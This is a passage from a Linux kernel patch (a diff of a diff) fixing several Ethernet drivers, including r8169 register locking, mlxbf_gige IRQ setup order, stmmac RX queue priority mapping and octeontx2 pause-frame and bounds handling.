++	xs->aead = kzalloc(aead_len, GFP_ATOMIC);
+ 	if (unlikely(!xs->aead)) {
+ 		err = -ENOMEM;
+ 		goto err_xs;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index e6fe599f7bf3a..254cad45a555f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -814,6 +814,11 @@ static int cgx_lmac_enadis_pause_frm(void *cgxd, int lmac_id,
+ 	if (!is_lmac_valid(cgx, lmac_id))
+ 		return -ENODEV;
+ 
++	cfg = cgx_read(cgx, lmac_id, CGXX_GMP_GMI_RXX_FRM_CTL);
++	cfg &= ~CGX_GMP_GMI_RXX_FRM_CTL_CTL_BCK;
++	cfg |= rx_pause ? CGX_GMP_GMI_RXX_FRM_CTL_CTL_BCK : 0x0;
++	cgx_write(cgx, lmac_id, CGXX_GMP_GMI_RXX_FRM_CTL, cfg);
++
+ 	cfg = cgx_read(cgx, lmac_id, CGXX_SMUX_RX_FRM_CTL);
+ 	cfg &= ~CGX_SMUX_RX_FRM_CTL_CTL_BCK;
+ 	cfg |= rx_pause ? CGX_SMUX_RX_FRM_CTL_CTL_BCK : 0x0;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index d1e6b12ecfa70..cc6d6c94f4002 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -160,6 +160,8 @@ static int rvu_map_cgx_lmac_pf(struct rvu *rvu)
+ 			continue;
+ 		lmac_bmap = cgx_get_lmac_bmap(rvu_cgx_pdata(cgx, rvu));
+ 		for_each_set_bit(iter, &lmac_bmap, rvu->hw->lmac_per_cgx) {
++			if (iter >= MAX_LMAC_COUNT)
++				continue;
+ 			lmac = cgx_get_lmacid(rvu_cgx_pdata(cgx, rvu),
+ 					      iter);
+ 			rvu->pf2cgxlmac_map[pf] = cgxlmac_id_to_bmap(cgx, lmac);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 55639c133dd02..91a4ea529d077 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -1669,7 +1669,7 @@ static int npc_fwdb_detect_load_prfl_img(struct rvu *rvu, uint64_t prfl_sz,
+ 	struct npc_coalesced_kpu_prfl *img_data = NULL;
+ 	int i = 0, rc = -EINVAL;
+ 	void __iomem *kpu_prfl_addr;
+-	u16 offset;
++	u32 offset;
+ 
+ 	img_data = (struct npc_coalesced_kpu_prfl __force *)rvu->kpu_prfl_addr;
+ 	if (le64_to_cpu(img_data->signature) == KPU_SIGN &&
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 7e2c30927c312..6b7fb324e756e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1914,7 +1914,7 @@ int otx2_open(struct net_device *netdev)
+ 	 * mcam entries are enabled to receive the packets. Hence disable the
+ 	 * packet I/O.
+ 	 */
+-	if (err == EIO)
++	if (err == -EIO)
+ 		goto err_disable_rxtx;
+ 	else if (err)
+ 		goto err_tx_stop_queues;
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+index 83c4659390fd5..d6b4d163bbbfd 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+@@ -14,6 +14,7 @@
+ #include <linux/module.h>
+ #include <linux/phy.h>
+ #include <linux/platform_device.h>
++#include <linux/rtnetlink.h>
+ #include <linux/skbuff.h>
+ 
+ #include "mlxbf_gige.h"
+@@ -139,13 +140,10 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 	control |= MLXBF_GIGE_CONTROL_PORT_EN;
+ 	writeq(control, priv->base + MLXBF_GIGE_CONTROL);
+ 
+-	err = mlxbf_gige_request_irqs(priv);
+-	if (err)
+-		return err;
+ 	mlxbf_gige_cache_stats(priv);
+ 	err = mlxbf_gige_clean_port(priv);
+ 	if (err)
+-		goto free_irqs;
++		return err;
+ 
+ 	/* Clear driver's valid_polarity to match hardware,
+ 	 * since the above call to clean_port() resets the
+@@ -157,7 +155,7 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 
+ 	err = mlxbf_gige_tx_init(priv);
+ 	if (err)
+-		goto free_irqs;
++		goto phy_deinit;
+ 	err = mlxbf_gige_rx_init(priv);
+ 	if (err)
+ 		goto tx_deinit;
+@@ -166,6 +164,10 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 	napi_enable(&priv->napi);
+ 	netif_start_queue(netdev);
+ 
++	err = mlxbf_gige_request_irqs(priv);
++	if (err)
++		goto napi_deinit;
++
+ 	/* Set bits in INT_EN that we care about */
+ 	int_en = MLXBF_GIGE_INT_EN_HW_ACCESS_ERROR |
+ 		 MLXBF_GIGE_INT_EN_TX_CHECKSUM_INPUTS |
+@@ -182,11 +184,17 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 
+ 	return 0;
+ 
++napi_deinit:
++	netif_stop_queue(netdev);
++	napi_disable(&priv->napi);
++	netif_napi_del(&priv->napi);
++	mlxbf_gige_rx_deinit(priv);
++
+ tx_deinit:
+ 	mlxbf_gige_tx_deinit(priv);
+ 
+-free_irqs:
+-	mlxbf_gige_free_irqs(priv);
++phy_deinit:
++	phy_stop(phydev);
+ 	return err;
+ }
+ 
+@@ -410,8 +418,13 @@ static void mlxbf_gige_shutdown(struct platform_device *pdev)
+ {
+ 	struct mlxbf_gige *priv = platform_get_drvdata(pdev);
+ 
+-	writeq(0, priv->base + MLXBF_GIGE_INT_EN);
+-	mlxbf_gige_clean_port(priv);
++	rtnl_lock();
++	netif_device_detach(priv->netdev);
++
++	if (netif_running(priv->netdev))
++		dev_close(priv->netdev);
++
++	rtnl_unlock();
+ }
+ 
+ static const struct acpi_device_id __maybe_unused mlxbf_gige_acpi_match[] = {
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.c b/drivers/net/ethernet/microchip/lan743x_main.c
+index e804613faa1fc..d5123e8c4a9f4 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.c
++++ b/drivers/net/ethernet/microchip/lan743x_main.c
+@@ -25,6 +25,8 @@
+ #define PCS_POWER_STATE_DOWN	0x6
+ #define PCS_POWER_STATE_UP	0x4
+ 
++#define RFE_RD_FIFO_TH_3_DWORDS	0x3
++
+ static void pci11x1x_strap_get_status(struct lan743x_adapter *adapter)
+ {
+ 	u32 chip_rev;
+@@ -3217,6 +3219,21 @@ static void lan743x_full_cleanup(struct lan743x_adapter *adapter)
+ 	lan743x_pci_cleanup(adapter);
+ }
+ 
++static void pci11x1x_set_rfe_rd_fifo_threshold(struct lan743x_adapter *adapter)
++{
++	u16 rev = adapter->csr.id_rev & ID_REV_CHIP_REV_MASK_;
++
++	if (rev == ID_REV_CHIP_REV_PCI11X1X_B0_) {
++		u32 misc_ctl;
++
++		misc_ctl = lan743x_csr_read(adapter, MISC_CTL_0);
++		misc_ctl &= ~MISC_CTL_0_RFE_READ_FIFO_MASK_;
++		misc_ctl |= FIELD_PREP(MISC_CTL_0_RFE_READ_FIFO_MASK_,
++				       RFE_RD_FIFO_TH_3_DWORDS);
++		lan743x_csr_write(adapter, MISC_CTL_0, misc_ctl);
++	}
++}
++
+ static int lan743x_hardware_init(struct lan743x_adapter *adapter,
+ 				 struct pci_dev *pdev)
+ {
+@@ -3232,6 +3249,7 @@ static int lan743x_hardware_init(struct lan743x_adapter *adapter,
+ 		pci11x1x_strap_get_status(adapter);
+ 		spin_lock_init(&adapter->eth_syslock_spinlock);
+ 		mutex_init(&adapter->sgmii_rw_lock);
++		pci11x1x_set_rfe_rd_fifo_threshold(adapter);
+ 	} else {
+ 		adapter->max_tx_channels = LAN743X_MAX_TX_CHANNELS;
+ 		adapter->used_tx_channels = LAN743X_USED_TX_CHANNELS;
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.h b/drivers/net/ethernet/microchip/lan743x_main.h
+index 67877d3b6dd98..d304be17b9d82 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.h
++++ b/drivers/net/ethernet/microchip/lan743x_main.h
+@@ -26,6 +26,7 @@
+ #define ID_REV_CHIP_REV_MASK_		(0x0000FFFF)
+ #define ID_REV_CHIP_REV_A0_		(0x00000000)
+ #define ID_REV_CHIP_REV_B0_		(0x00000010)
++#define ID_REV_CHIP_REV_PCI11X1X_B0_	(0x000000B0)
+ 
+ #define FPGA_REV			(0x04)
+ #define FPGA_REV_GET_MINOR_(fpga_rev)	(((fpga_rev) >> 8) & 0x000000FF)
+@@ -311,6 +312,9 @@
+ #define SGMII_CTL_LINK_STATUS_SOURCE_	BIT(8)
+ #define SGMII_CTL_SGMII_POWER_DN_	BIT(1)
+ 
++#define MISC_CTL_0			(0x920)
++#define MISC_CTL_0_RFE_READ_FIFO_MASK_	GENMASK(6, 4)
++
+ /* Vendor Specific SGMII MMD details */
+ #define SR_VSMMD_PCS_ID1		0x0004
+ #define SR_VSMMD_PCS_ID2		0x0005
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index 06663c11ca96d..6e3417712e402 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -615,6 +615,9 @@ struct rtl8169_private {
+ 		struct work_struct work;
+ 	} wk;
+ 
++	spinlock_t config25_lock;
++	spinlock_t mac_ocp_lock;
++
+ 	unsigned supports_gmii:1;
+ 	unsigned aspm_manageable:1;
+ 	unsigned dash_enabled:1;
+@@ -678,6 +681,28 @@ static void rtl_pci_commit(struct rtl8169_private *tp)
+ 	RTL_R8(tp, ChipCmd);
+ }
+ 
++static void rtl_mod_config2(struct rtl8169_private *tp, u8 clear, u8 set)
++{
++	unsigned long flags;
++	u8 val;
++
++	spin_lock_irqsave(&tp->config25_lock, flags);
++	val = RTL_R8(tp, Config2);
++	RTL_W8(tp, Config2, (val & ~clear) | set);
++	spin_unlock_irqrestore(&tp->config25_lock, flags);
++}
++
++static void rtl_mod_config5(struct rtl8169_private *tp, u8 clear, u8 set)
++{
++	unsigned long flags;
++	u8 val;
++
++	spin_lock_irqsave(&tp->config25_lock, flags);
++	val = RTL_R8(tp, Config5);
++	RTL_W8(tp, Config5, (val & ~clear) | set);
++	spin_unlock_irqrestore(&tp->config25_lock, flags);
++}
++
+ static bool rtl_is_8125(struct rtl8169_private *tp)
+ {
+ 	return tp->mac_version >= RTL_GIGA_MAC_VER_61;
+@@ -850,7 +875,7 @@ static int r8168_phy_ocp_read(struct rtl8169_private *tp, u32 reg)
+ 		(RTL_R32(tp, GPHY_OCP) & 0xffff) : -ETIMEDOUT;
+ }
+ 
+-static void r8168_mac_ocp_write(struct rtl8169_private *tp, u32 reg, u32 data)
++static void __r8168_mac_ocp_write(struct rtl8169_private *tp, u32 reg, u32 data)
+ {
+ 	if (rtl_ocp_reg_failure(reg))
+ 		return;
+@@ -858,7 +883,16 @@ static void r8168_mac_ocp_write(struct rtl8169_private *tp, u32 reg, u32 data)
+ 	RTL_W32(tp, OCPDR, OCPAR_FLAG | (reg << 15) | data);
+ }
+ 
+-static u16 r8168_mac_ocp_read(struct rtl8169_private *tp, u32 reg)
++static void r8168_mac_ocp_write(struct rtl8169_private *tp, u32 reg, u32 data)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&tp->mac_ocp_lock, flags);
++	__r8168_mac_ocp_write(tp, reg, data);
++	spin_unlock_irqrestore(&tp->mac_ocp_lock, flags);
++}
++
++static u16 __r8168_mac_ocp_read(struct rtl8169_private *tp, u32 reg)
+ {
+ 	if (rtl_ocp_reg_failure(reg))
+ 		return 0;
+@@ -868,12 +902,28 @@ static u16 r8168_mac_ocp_read(struct rtl8169_private *tp, u32 reg)
+ 	return RTL_R32(tp, OCPDR);
+ }
+ 
++static u16 r8168_mac_ocp_read(struct rtl8169_private *tp, u32 reg)
++{
++	unsigned long flags;
++	u16 val;
++
++	spin_lock_irqsave(&tp->mac_ocp_lock, flags);
++	val = __r8168_mac_ocp_read(tp, reg);
++	spin_unlock_irqrestore(&tp->mac_ocp_lock, flags);
++
++	return val;
++}
++
+ static void r8168_mac_ocp_modify(struct rtl8169_private *tp, u32 reg, u16 mask,
+ 				 u16 set)
+ {
+-	u16 data = r8168_mac_ocp_read(tp, reg);
++	unsigned long flags;
++	u16 data;
+ 
+-	r8168_mac_ocp_write(tp, reg, (data & ~mask) | set);
++	spin_lock_irqsave(&tp->mac_ocp_lock, flags);
++	data = __r8168_mac_ocp_read(tp, reg);
++	__r8168_mac_ocp_write(tp, reg, (data & ~mask) | set);
++	spin_unlock_irqrestore(&tp->mac_ocp_lock, flags);
+ }
+ 
+ /* Work around a hw issue with RTL8168g PHY, the quirk disables
+@@ -1135,17 +1185,40 @@ static void rtl8168ep_stop_cmac(struct rtl8169_private *tp)
+ 	RTL_W8(tp, IBCR0, RTL_R8(tp, IBCR0) & ~0x01);
+ }
+ 
++static void rtl_dash_loop_wait(struct rtl8169_private *tp,
++			       const struct rtl_cond *c,
++			       unsigned long usecs, int n, bool high)
++{
++	if (!tp->dash_enabled)
++		return;
++	rtl_loop_wait(tp, c, usecs, n, high);
++}
++
++static void rtl_dash_loop_wait_high(struct rtl8169_private *tp,
++				    const struct rtl_cond *c,
++				    unsigned long d, int n)
++{
++	rtl_dash_loop_wait(tp, c, d, n, true);
++}
++
++static void rtl_dash_loop_wait_low(struct rtl8169_private *tp,
++				   const struct rtl_cond *c,
++				   unsigned long d, int n)
++{
++	rtl_dash_loop_wait(tp, c, d, n, false);
++}
++
+ static void rtl8168dp_driver_start(struct rtl8169_private *tp)
+ {
+ 	r8168dp_oob_notify(tp, OOB_CMD_DRIVER_START);
+-	rtl_loop_wait_high(tp, &rtl_dp_ocp_read_cond, 10000, 10);
++	rtl_dash_loop_wait_high(tp, &rtl_dp_ocp_read_cond, 10000, 10);
+ }
+ 
+ static void rtl8168ep_driver_start(struct rtl8169_private *tp)
+ {
+ 	r8168ep_ocp_write(tp, 0x01, 0x180, OOB_CMD_DRIVER_START);
+ 	r8168ep_ocp_write(tp, 0x01, 0x30, r8168ep_ocp_read(tp, 0x30) | 0x01);
+-	rtl_loop_wait_high(tp, &rtl_ep_ocp_read_cond, 10000, 30);
++	rtl_dash_loop_wait_high(tp, &rtl_ep_ocp_read_cond, 10000, 30);
+ }
+ 
+ static void rtl8168_driver_start(struct rtl8169_private *tp)
+@@ -1159,7 +1232,7 @@ static void rtl8168_driver_start(struct rtl8169_private *tp)
+ static void rtl8168dp_driver_stop(struct rtl8169_private *tp)
+ {
+ 	r8168dp_oob_notify(tp, OOB_CMD_DRIVER_STOP);
+-	rtl_loop_wait_low(tp, &rtl_dp_ocp_read_cond, 10000, 10);
++	rtl_dash_loop_wait_low(tp, &rtl_dp_ocp_read_cond, 10000, 10);
+ }
+ 
+ static void rtl8168ep_driver_stop(struct rtl8169_private *tp)
+@@ -1167,7 +1240,7 @@ static void rtl8168ep_driver_stop(struct rtl8169_private *tp)
+ 	rtl8168ep_stop_cmac(tp);
+ 	r8168ep_ocp_write(tp, 0x01, 0x180, OOB_CMD_DRIVER_STOP);
+ 	r8168ep_ocp_write(tp, 0x01, 0x30, r8168ep_ocp_read(tp, 0x30) | 0x01);
+-	rtl_loop_wait_low(tp, &rtl_ep_ocp_read_cond, 10000, 10);
++	rtl_dash_loop_wait_low(tp, &rtl_ep_ocp_read_cond, 10000, 10);
+ }
+ 
+ static void rtl8168_driver_stop(struct rtl8169_private *tp)
+@@ -1351,6 +1424,7 @@ static void __rtl8169_set_wol(struct rtl8169_private *tp, u32 wolopts)
+ 		{ WAKE_MAGIC, Config3, MagicPacket }
+ 	};
+ 	unsigned int i, tmp = ARRAY_SIZE(cfg);
++	unsigned long flags;
+ 	u8 options;
+ 
+ 	rtl_unlock_config_regs(tp);
+@@ -1369,12 +1443,14 @@ static void __rtl8169_set_wol(struct rtl8169_private *tp, u32 wolopts)
+ 			r8168_mac_ocp_modify(tp, 0xc0b6, BIT(0), 0);
+ 	}
+ 
++	spin_lock_irqsave(&tp->config25_lock, flags);
+ 	for (i = 0; i < tmp; i++) {
+ 		options = RTL_R8(tp, cfg[i].reg) & ~cfg[i].mask;
+ 		if (wolopts & cfg[i].opt)
+ 			options |= cfg[i].mask;
+ 		RTL_W8(tp, cfg[i].reg, options);
+ 	}
++	spin_unlock_irqrestore(&tp->config25_lock, flags);
+ 
+ 	switch (tp->mac_version) {
+ 	case RTL_GIGA_MAC_VER_02 ... RTL_GIGA_MAC_VER_06:
+@@ -1386,10 +1462,10 @@ static void __rtl8169_set_wol(struct rtl8169_private *tp, u32 wolopts)
+ 	case RTL_GIGA_MAC_VER_34:
+ 	case RTL_GIGA_MAC_VER_37:
+ 	case RTL_GIGA_MAC_VER_39 ... RTL_GIGA_MAC_VER_63:
+-		options = RTL_R8(tp, Config2) & ~PME_SIGNAL;
+ 		if (wolopts)
+-			options |= PME_SIGNAL;
+-		RTL_W8(tp, Config2, options);
++			rtl_mod_config2(tp, 0, PME_SIGNAL);
++		else
++			rtl_mod_config2(tp, PME_SIGNAL, 0);
+ 		break;
+ 	default:
+ 		break;
+@@ -2696,10 +2772,13 @@ static void rtl_disable_exit_l1(struct rtl8169_private *tp)
+ 
+ static void rtl_hw_aspm_clkreq_enable(struct rtl8169_private *tp, bool enable)
+ {
++	if (tp->mac_version < RTL_GIGA_MAC_VER_32)
++		return;
++
+ 	/* Don't enable ASPM in the chip if OS can't control ASPM */
+ 	if (enable && tp->aspm_manageable) {
+-		RTL_W8(tp, Config5, RTL_R8(tp, Config5) | ASPM_en);
+-		RTL_W8(tp, Config2, RTL_R8(tp, Config2) | ClkReqEn);
++		rtl_mod_config5(tp, 0, ASPM_en);
++		rtl_mod_config2(tp, 0, ClkReqEn);
+ 
+ 		switch (tp->mac_version) {
+ 		case RTL_GIGA_MAC_VER_46 ... RTL_GIGA_MAC_VER_48:
+@@ -2722,11 +2801,9 @@ static void rtl_hw_aspm_clkreq_enable(struct rtl8169_private *tp, bool enable)
+ 			break;
+ 		}
+ 
+-		RTL_W8(tp, Config2, RTL_R8(tp, Config2) & ~ClkReqEn);
+-		RTL_W8(tp, Config5, RTL_R8(tp, Config5) & ~ASPM_en);
++		rtl_mod_config2(tp, ClkReqEn, 0);
++		rtl_mod_config5(tp, ASPM_en, 0);
+ 	}
+-
+-	udelay(10);
+ }
+ 
+ static void rtl_set_fifo_size(struct rtl8169_private *tp, u16 rx_stat,
+@@ -2884,7 +2961,7 @@ static void rtl_hw_start_8168e_1(struct rtl8169_private *tp)
+ 	RTL_W32(tp, MISC, RTL_R32(tp, MISC) | TXPLA_RST);
+ 	RTL_W32(tp, MISC, RTL_R32(tp, MISC) & ~TXPLA_RST);
+ 
+-	RTL_W8(tp, Config5, RTL_R8(tp, Config5) & ~Spi_en);
++	rtl_mod_config5(tp, Spi_en, 0);
+ }
+ 
+ static void rtl_hw_start_8168e_2(struct rtl8169_private *tp)
+@@ -2917,7 +2994,7 @@ static void rtl_hw_start_8168e_2(struct rtl8169_private *tp)
+ 
+ 	RTL_W8(tp, DLLPR, RTL_R8(tp, DLLPR) | PFM_EN);
+ 	RTL_W32(tp, MISC, RTL_R32(tp, MISC) | PWM_EN);
+-	RTL_W8(tp, Config5, RTL_R8(tp, Config5) & ~Spi_en);
++	rtl_mod_config5(tp, Spi_en, 0);
+ 
+ 	rtl_hw_aspm_clkreq_enable(tp, true);
+ }
+@@ -2940,7 +3017,7 @@ static void rtl_hw_start_8168f(struct rtl8169_private *tp)
+ 	RTL_W8(tp, MCU, RTL_R8(tp, MCU) & ~NOW_IS_OOB);
+ 	RTL_W8(tp, DLLPR, RTL_R8(tp, DLLPR) | PFM_EN);
+ 	RTL_W32(tp, MISC, RTL_R32(tp, MISC) | PWM_EN);
+-	RTL_W8(tp, Config5, RTL_R8(tp, Config5) & ~Spi_en);
++	rtl_mod_config5(tp, Spi_en, 0);
+ 
+ 	rtl8168_config_eee_mac(tp);
+ }
+@@ -5032,6 +5109,15 @@ static int r8169_mdio_register(struct rtl8169_private *tp)
+ 	struct mii_bus *new_bus;
+ 	int ret;
+ 
++	/* On some boards with this chip version the BIOS is buggy and fails
++	 * to reset the PHY page selector. This results in the PHY ID read
++	 * accessing registers on a different page, returning a more or
++	 * less random value. Fix this by resetting the page selector first.
++	 */
++	if (tp->mac_version == RTL_GIGA_MAC_VER_25 ||
++	    tp->mac_version == RTL_GIGA_MAC_VER_26)
++		r8169_mdio_write(tp, 0x1f, 0);
++
+ 	new_bus = devm_mdiobus_alloc(&pdev->dev);
+ 	if (!new_bus)
+ 		return -ENOMEM;
+@@ -5062,7 +5148,7 @@ static int r8169_mdio_register(struct rtl8169_private *tp)
+ 		return -EUNATCH;
+ 	}
+ 
+-	tp->phydev->mac_managed_pm = 1;
++	tp->phydev->mac_managed_pm = true;
+ 
+ 	phy_support_asym_pause(tp->phydev);
+ 
+@@ -5200,6 +5286,9 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	tp->eee_adv = -1;
+ 	tp->ocp_base = OCP_STD_PHY_BASE;
+ 
++	spin_lock_init(&tp->config25_lock);
++	spin_lock_init(&tp->mac_ocp_lock);
++
+ 	dev->tstats = devm_netdev_alloc_pcpu_stats(&pdev->dev,
+ 						   struct pcpu_sw_netstats);
+ 	if (!dev->tstats)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index e7b70006261f7..756ac4a07f60b 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1290,25 +1290,16 @@ static int ravb_poll(struct napi_struct *napi, int budget)
+ 	struct net_device *ndev = napi->dev;
+ 	struct ravb_private *priv = netdev_priv(ndev);
+ 	const struct ravb_hw_info *info = priv->info;
+-	bool gptp = info->gptp || info->ccc_gac;
+-	struct ravb_rx_desc *desc;
+ 	unsigned long flags;
+ 	int q = napi - priv->napi;
+ 	int mask = BIT(q);
+ 	int quota = budget;
+-	unsigned int entry;
++	bool unmask;
+ 
+-	if (!gptp) {
+-		entry = priv->cur_rx[q] % priv->num_rx_ring[q];
+-		desc = &priv->gbeth_rx_ring[entry];
+-	}
+ 	/* Processing RX Descriptor Ring */
+ 	/* Clear RX interrupt */
+ 	ravb_write(ndev, ~(mask | RIS0_RESERVED), RIS0);
+-	if (gptp || desc->die_dt != DT_FEMPTY) {
+-		if (ravb_rx(ndev, &quota, q))
+-			goto out;
+-	}
++	unmask = !ravb_rx(ndev, &quota, q);
+ 
+ 	/* Processing TX Descriptor Ring */
+ 	spin_lock_irqsave(&priv->lock, flags);
+@@ -1318,6 +1309,18 @@ static int ravb_poll(struct napi_struct *napi, int budget)
+ 	netif_wake_subqueue(ndev, q);
+ 	spin_unlock_irqrestore(&priv->lock, flags);
+ 
++	/* Receive error message handling */
++	priv->rx_over_errors = priv->stats[RAVB_BE].rx_over_errors;
++	if (info->nc_queues)
++		priv->rx_over_errors += priv->stats[RAVB_NC].rx_over_errors;
++	if (priv->rx_over_errors != ndev->stats.rx_over_errors)
++		ndev->stats.rx_over_errors = priv->rx_over_errors;
++	if (priv->rx_fifo_errors != ndev->stats.rx_fifo_errors)
++		ndev->stats.rx_fifo_errors = priv->rx_fifo_errors;
++
++	if (!unmask)
++		goto out;
++
+ 	napi_complete(napi);
+ 
+ 	/* Re-enable RX/TX interrupts */
+@@ -1331,14 +1334,6 @@ static int ravb_poll(struct napi_struct *napi, int budget)
+ 	}
+ 	spin_unlock_irqrestore(&priv->lock, flags);
+ 
+-	/* Receive error message handling */
+-	priv->rx_over_errors =  priv->stats[RAVB_BE].rx_over_errors;
+-	if (info->nc_queues)
+-		priv->rx_over_errors += priv->stats[RAVB_NC].rx_over_errors;
+-	if (priv->rx_over_errors != ndev->stats.rx_over_errors)
+-		ndev->stats.rx_over_errors = priv->rx_over_errors;
+-	if (priv->rx_fifo_errors != ndev->stats.rx_fifo_errors)
+-		ndev->stats.rx_fifo_errors = priv->rx_fifo_errors;
+ out:
+ 	return budget - quota;
+ }
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index 84276eb681d70..39112d5cb5b80 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -87,19 +87,41 @@ static void dwmac4_rx_queue_priority(struct mac_device_info *hw,
+ 				     u32 prio, u32 queue)
+ {
+ 	void __iomem *ioaddr = hw->pcsr;
+-	u32 base_register;
+-	u32 value;
++	u32 clear_mask = 0;
++	u32 ctrl2, ctrl3;
++	int i;
+ 
+-	base_register = (queue < 4) ? GMAC_RXQ_CTRL2 : GMAC_RXQ_CTRL3;
+-	if (queue >= 4)
+-		queue -= 4;
++	ctrl2 = readl(ioaddr + GMAC_RXQ_CTRL2);
++	ctrl3 = readl(ioaddr + GMAC_RXQ_CTRL3);
+ 
+-	value = readl(ioaddr + base_register);
++	/* The software must ensure that the same priority
++	 * is not mapped to multiple Rx queues
++	 */
++	for (i = 0; i < 4; i++)
++		clear_mask |= ((prio << GMAC_RXQCTRL_PSRQX_SHIFT(i)) &
++						GMAC_RXQCTRL_PSRQX_MASK(i));
+ 
+-	value &= ~GMAC_RXQCTRL_PSRQX_MASK(queue);
+-	value |= (prio << GMAC_RXQCTRL_PSRQX_SHIFT(queue)) &
++	ctrl2 &= ~clear_mask;
++	ctrl3 &= ~clear_mask;
++
++	/* First assign new priorities to a queue, then
++	 * clear them from others queues
++	 */
++	if (queue < 4) {
++		ctrl2 |= (prio << GMAC_RXQCTRL_PSRQX_SHIFT(queue)) &
+ 						GMAC_RXQCTRL_PSRQX_MASK(queue);
+-	writel(value, ioaddr + base_register);
++
++		writel(ctrl2, ioaddr + GMAC_RXQ_CTRL2);
++		writel(ctrl3, ioaddr + GMAC_RXQ_CTRL3);
++	} else {
++		queue -= 4;
++
++		ctrl3 |= (prio << GMAC_RXQCTRL_PSRQX_SHIFT(queue)) &
++						GMAC_RXQCTRL_PSRQX_MASK(queue);
++
++		writel(ctrl3, ioaddr + GMAC_RXQ_CTRL3);
++		writel(ctrl2, ioaddr + GMAC_RXQ_CTRL2);
++	}
+ }
+ 
+ static void dwmac4_tx_queue_priority(struct mac_device_info *hw,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index ec1616ffbfa7a..dd73f38ec08d8 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -97,17 +97,41 @@ static void dwxgmac2_rx_queue_prio(struct mac_device_info *hw, u32 prio,
+ 				   u32 queue)
+ {
+ 	void __iomem *ioaddr = hw->pcsr;
+-	u32 value, reg;
++	u32 clear_mask = 0;
++	u32 ctrl2, ctrl3;
++	int i;
+ 
+-	reg = (queue < 4) ? XGMAC_RXQ_CTRL2 : XGMAC_RXQ_CTRL3;
+-	if (queue >= 4)
++	ctrl2 = readl(ioaddr + XGMAC_RXQ_CTRL2);
++	ctrl3 = readl(ioaddr + XGMAC_RXQ_CTRL3);
++
++	/* The software must ensure that the same priority
++	 * is not mapped to multiple Rx queues
++	 */
++	for (i = 0; i < 4; i++)
++		clear_mask |= ((prio << XGMAC_PSRQ_SHIFT(i)) &
++						XGMAC_PSRQ(i));
++
++	ctrl2 &= ~clear_mask;
++	ctrl3 &= ~clear_mask;
++
++	/* First assign new priorities to a queue, then
++	 * clear them from other queues
++	 */
++	if (queue < 4) {
++		ctrl2 |= (prio << XGMAC_PSRQ_SHIFT(queue)) &
++						XGMAC_PSRQ(queue);
++
++		writel(ctrl2, ioaddr + XGMAC_RXQ_CTRL2);
++		writel(ctrl3, ioaddr + XGMAC_RXQ_CTRL3);
++	} else {
+ 		queue -= 4;
+ 
+-	value = readl(ioaddr + reg);
+-	value &= ~XGMAC_PSRQ(queue);
+-	value |= (prio << XGMAC_PSRQ_SHIFT(queue)) & XGMAC_PSRQ(queue);
++		ctrl3 |= (prio << XGMAC_PSRQ_SHIFT(queue)) &
++						XGMAC_PSRQ(queue);
+ 
+-	writel(value, ioaddr + reg);
++		writel(ctrl3, ioaddr + XGMAC_RXQ_CTRL3);
++		writel(ctrl2, ioaddr + XGMAC_RXQ_CTRL2);
++	}
+ }
+ 
+ static void dwxgmac2_tx_queue_prio(struct mac_device_info *hw, u32 prio,
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 9481f172830f5..2cbb1d1830bbd 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -2188,6 +2188,7 @@ static int lan8814_hwtstamp(struct mii_timestamper *mii_ts, struct ifreq *ifr)
